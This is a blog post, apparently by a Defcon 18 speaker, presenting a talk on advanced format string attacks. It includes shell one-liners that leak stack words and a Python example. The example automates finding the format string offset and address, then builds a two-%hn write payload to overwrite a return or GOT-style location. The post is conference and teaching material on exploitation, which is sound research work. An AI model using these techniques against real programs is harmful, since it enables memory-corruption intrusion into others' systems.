
Defcon: Advanced Format String Attacks

Congratulations to those who survived the giant hangover that was Defcon 18, my presentation on Advanced Format String Attacks, and especially the post-talk Q&A and Mario Kart. The presentation continued my earlier Automatic Format String Exploitation research, and the updated slides are here: defcon-18-paul_haas-advanced_format_string_attacks_final.pdf. I have also uploaded the demos from the talk, without audio:

Demo 1: Attacking a program vulnerable (Makefile) to a format string attack. We dump the program's stack one positional argument at a time, printing each word both as hex and as raw bytes, until we find the bytes of the format string we passed in. The dollar signs in the format must be escaped so the shell does not expand $0, and the loop is stopped by hand once the "%NNN$0" bytes of our own string show up:
for i in {001..200}; do echo -n "offset $i (%$i\$08x) = "; ./printf "%$i\$08x" | python3 -c "import sys, struct; s=int(sys.stdin.read(),16); print('0x%08x: %r' % (s, struct.pack('L', s)))"; done

Demo 2: Finding the address of our format string. %N$p prints the word at each offset and %N$s dereferences it; the offset whose dereference prints our own format string holds a pointer to it. Combined with the stack offset found in the previous step, this lets us associate any word on the stack with its address. Runs where %s hits an unmapped address crash before their buffered output is flushed, leaving blank lines that grep removes:
for i in {1..100}; do ./printf "offset $i = %$i\$p:%$i\$s"; echo; done | grep -v '^$'

Demo 3: Video of the technique as implemented in our previous proof-of-concept tool, which automatically exploits a program vulnerable to a format string attack by locating the stack offset and the address of our exploit and overwriting a known return location.

Demo 4: Automatically exploiting a program vulnerable to a format string attack by locating the stack offset and the address of our exploit, then brute-forcing addresses on the stack to find a valid return location. Both a Python and a Ruby implementation are included.

Demo 5: Metasploit demonstration of a remote server vulnerable to a format string attack, exploited automatically by locating the stack offset and the address of our exploit and brute-forcing addresses on the stack to find a valid return location. The Metasploit module and the vulnerable server are available for download.
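To show how the pieces above fit together in code, here is an added example that is not part of the talk or the archive: it fakes a 32-bit ./printf-style target (constructed here, with invented junk words, argument numbers and addresses) whose argument is copied into a stack buffer and used as the format string, automates the Demo 1 and Demo 2 loops against it, and then uses the recovered offset and address to build the two-%hn write that Demos 3 to 5 perform against a known return location. The fake target's run() is the only piece that stands in for the real binary; the GOT-style target address 0x0804A014 is hypothetical.

```python
import re
import struct

WORD = 4  # the demos target a 32-bit binary; this example assumes the same
SPEC = re.compile(rb"%(?:(\d+)\$)?(0?\d+)?(hn|[xpsc])")  # the specifiers the demos use


class FakeTarget:
    """Constructed stand-in for the demos' ./printf: the argument is copied into a stack
    buffer that is passed to printf() as its format string. All values are invented."""

    def __init__(self, buf_addr=0xBFFFF500):
        self.buf_addr = buf_addr  # address of the stack buffer holding the format
        self.mem = {}             # bytes stored by %hn / %n writes

    def read32(self, addr):
        return sum(self.mem.get(addr + k, 0) << (8 * k) for k in range(4))

    def _read_string(self, addr):  # %s: only the buffer itself is mapped
        if not self.buf_addr <= addr < self.buf_addr + len(self._buf):
            raise LookupError(hex(addr))  # the real process segfaults here
        return self._buf[addr - self.buf_addr:].split(b"\0", 1)[0]

    def run(self, fmt):
        """Output of printf(fmt), or b'' if it crashed: the buffered output is
        lost, which is why Demo 2 greps the blank lines away."""
        self._buf = fmt + b"\0" * (WORD - len(fmt) % WORD)
        # arguments 1..6 are junk the real frame would hold (4 is the saved pointer
        # to the buffer); from argument 7 on, the arguments are the buffer itself
        junk = [0x0804A0B0, 0xB7FD2FF4, 0x00000003, self.buf_addr, 0x41, 0xBFFFF6C4]
        slots = [None] + junk + list(struct.unpack("<%dI" % (len(self._buf) // WORD), self._buf))
        out, pos, nxt = b"", 0, 1
        try:
            for m in SPEC.finditer(fmt):
                out += fmt[pos:m.start()]
                pos = m.end()
                idx, width, conv = m.groups()
                if idx:
                    i = int(idx)            # %N$ addresses argument N directly
                else:
                    i, nxt = nxt, nxt + 1   # a plain % takes the next argument
                val = slots[i] if 0 < i < len(slots) else 0
                w = width.decode() if width else ""
                if conv == b"x":
                    out += (("%" + w + "x") % val).encode()
                elif conv == b"p":
                    out += ("0x%x" % val).encode() if val else b"(nil)"
                elif conv == b"c":
                    out += bytes([val & 0xFF]).rjust(int(w or 1))
                elif conv == b"s":
                    out += self._read_string(val)
                else:                       # %hn / %n store the byte count so far
                    for k in range(2 if conv == b"hn" else 4):
                        self.mem[val + k] = (len(out) >> (8 * k)) & 0xFF
        except LookupError:
            return b""
        return out + fmt[pos:]


def find_format_offset(run, max_offset=200):
    """Demo 1, automated: probe %N$08x until the leaked word is the first four bytes of
    the format string we passed (assumes a word-aligned buffer; else prepend 1-3 bytes)."""
    for i in range(1, max_offset + 1):
        fmt = b"%%%d$08x" % i
        out = run(fmt)
        if len(out) >= 8 and struct.pack("<I", int(out[-8:], 16)) == fmt[:WORD]:
            return i
    return None


def find_format_address(run, max_offset=100):
    """Demo 2, automated: %N$p shows each word and %N$s dereferences it; the word
    whose dereference is our own format string is a pointer to that string."""
    for i in range(1, max_offset + 1):
        fmt = b"%%%d$p:%%%d$s" % (i, i)
        ptr, _, deref = run(fmt).partition(b":")
        if deref == fmt:
            return i, int(ptr, 16)
    return None


def slot_address(fmt_addr, fmt_offset, idx):
    """Address of argument `idx` when the format string is the stack buffer found
    at argument `fmt_offset` and address `fmt_addr`."""
    return fmt_addr + (idx - fmt_offset) * WORD


def build_write_payload(addr, value, offset, written=0):
    """Format string storing 32-bit `value` at `addr` with two %hn writes. The target
    addresses lead the payload so they become arguments `offset` and `offset + 1`."""
    payload = struct.pack("<II", addr, addr + 2)  # addr must not contain NUL or '%'
    written += len(payload)
    for half, idx in sorted([(value & 0xFFFF, offset), (value >> 16, offset + 1)]):
        pad = (half - written) % 0x10000 or 0x10000  # %<pad>c prints exactly pad bytes
        payload += b"%%%dc%%%d$hn" % (pad, idx)
        written += pad
    return payload
```

Against the real ./printf, replace FakeTarget.run with a function that runs the binary through subprocess with the probe as its argument and returns its stdout, exactly what the two shell loops above do by hand. The payload is built from the count glibc tracks for %n, so anything the program prints before the format string must be passed as `written`; and because each %hn write is padded with up to 64 KiB of output, the approach is fine locally but is the reason the remote case in Demo 5 is more delicate.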

All of the above plus additional documentation can be downloaded in a single archive here: DEFCON-18-Haas-Adv-Format-String-Attacks.tar.bz2
